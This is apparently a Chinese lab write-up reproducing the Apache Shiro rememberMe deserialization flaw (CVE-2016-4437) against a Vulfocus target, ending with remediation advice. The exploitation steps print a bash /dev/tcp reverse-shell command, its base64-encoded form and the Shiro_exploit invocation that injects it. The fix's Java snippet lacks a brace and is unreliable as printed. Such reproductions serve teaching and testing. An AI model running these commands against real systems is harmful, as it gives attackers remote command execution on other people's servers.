CVE-2016-4437 Shiro反序列化漏洞复现

一、漏洞概述

Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。

Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。

二、影响版本

Apache Shiro <= 1.2.4
 

三、漏洞原理

shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、AES加密、Base64编码操作。在识别身份的时候,需要对Cookie里的rememberMe字段解密。根据加密的顺序可以推断出解密的顺序为获取cookie-base64解码-AES解密-反序列化。

AES加密的KEY值被硬编码在代码中,可以从源码中找到KEY值。攻击者可以构造恶意代码,将其序列化-AES加密-base64编码,最后作为cookie值得rememberMe字段发送,shiro将接收到的rememberMe字段进行解码-解密-反序列化,如果成功,则执行恶意代码,构成攻击。

————https://www.cnblogs.com/peace-and-romance/p/15669560.html

四、漏洞复现环境

Kali Linux + Vulfocus
渗透机:Kali Linux 
靶机:Vulfocus

五、实验步骤

1.开启vulfoucs并获取实验镜像

CVE-2016-4437 Shiro反序列化漏洞复现_第1张图片

2.使用Shiro_exploit检测是否存在shiro漏洞

项目链接:https://github.com/insightglacier/Shiro_exploit

1

python3 shiro_exploit.py -u http://192.168.117.131:45182

CVE-2016-4437 Shiro反序列化漏洞复现_第2张图片

 vulnerable:Ture即表示存在shiro漏洞

3.监听4216端口

4.对反弹shell命令进行加密并利用

1

2

3

bash -i >& /dev/tcp/192.168.117.131/4216 0>&1

base 64加密

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExNy4xMzEvNDIxNiAwPiYx}|{base64,-d}|{bash,-i}

进而利用漏洞,获取flag,完结撒花

1

python3 shiro_exploit.py -3 -u http://192.168.117.131:45182 -"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExNy4xMzEvNDIxNiAwPiYx}|{base64,-d}|{bash,-i}"

CVE-2016-4437 Shiro反序列化漏洞复现_第3张图片

六、修复方式

修复建议:升级shiro至最新版本1.7.0并生成新的密钥替换,注意妥善保管密钥。
利用官方提供的方法生成密钥:org.apache.shiro.crypto.AbstractSymmetricCipherService#generateNewKey(int),替换key修复指南:如以下内容!

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

package com.iot.mainsite.component.shiro;

import lombok.extern.slf4j.Slf4j;

import org.springframework.context.annotation.Bean;

import javax.crypto.KeyGenerator;

import javax.crypto.SecretKey;

import java.security.NoSuchAlgorithmException;

/**

 *

GenerateCipherKey 此类用于:

 *

@author:hujm

 *

@date:2021年12月07日 19:02

 *

@remark:

 */

@Slf4j

public class GenerateCipherKey {

    /**

     * 随机生成秘钥,参考org.apache.shiro.crypto.AbstractSymmetricCipherService#generateNewKey(int)

     *

     * @return 随机生成秘钥

     */

    @Bean

    public static byte[] generateNewKey() {

        KeyGenerator keyGenerator;

        try {

            keyGenerator = KeyGenerator.getInstance("AES");

        catch (NoSuchAlgorithmException e) {

            String msg = "Unable to acquire AES algorithm. This is required to function.";

            throw new IllegalStateException(msg, e);

        }

        keyGenerator.init(128);

        SecretKey secretKey = keyGenerator.generateKey();

        byte[] encoded = secretKey.getEncoded();

        log.info("生成随机秘钥成功!");

        return encoded;

    }

}————https://blog.csdn.net/m0_67401835/article/details/123828791

你可能感兴趣的:(漏洞复现,安全,linux,运维)